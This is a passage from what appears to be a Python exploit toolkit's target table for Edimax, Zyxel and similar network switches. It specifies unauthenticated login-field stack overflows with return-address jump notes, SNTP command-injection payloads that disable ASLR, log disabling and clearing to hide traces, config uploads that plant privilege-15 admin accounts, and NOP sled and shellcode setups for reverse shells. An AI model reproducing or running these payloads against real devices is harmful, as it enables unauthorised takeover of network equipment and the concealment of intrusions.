/tmp/check`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_timeSntpDel',\r\n\t\t\t\t\t\t'delete_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntpStatus=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'',\t\t\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()\r\n\t\t\t\t\t\t'log_settings_set':0x00,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x00,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x00,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntpServer=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&cursntpPort=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntpServer=+&cursntpPort=139',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntpStatus=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntpStatus=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x00,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x00,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x00,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x00,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x00,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Edimax': { \r\n\t\t\t\t'vendor': 'EDIMAX Technology Co., Ltd.',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'1',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t#'encryption':'nopassword',\r\n\t\t\t\t\t\t#'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" nopassword\\n\\n------', # Yep, working too\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&dlsType=0',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&dlsType=0',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139&dlsType=0',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Zyxel': {\r\n\t\t\t\t'vendor': 'Zyxel Communications Corp.',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'encode',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=4353',\r\n\t\t\t\t\t\t'status':'/cgi-bin/dispatcher.cgi?cmd=4352',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_4364=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_4364=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from heap overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username='+ self.random_string(112) + '&password='+ self.random_string(60) + '&STARTUP_BACKUP=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t#'encryption':'nopassword',\r\n\t\t\t\t\t\t#'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" nopassword\\n\\n------', # Yep, working too\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=139&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(100) +'_JUMP_&password='+ self.random_string(60) +'_CMD_&STARTUP_BACKUP=1',\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: del priv 15 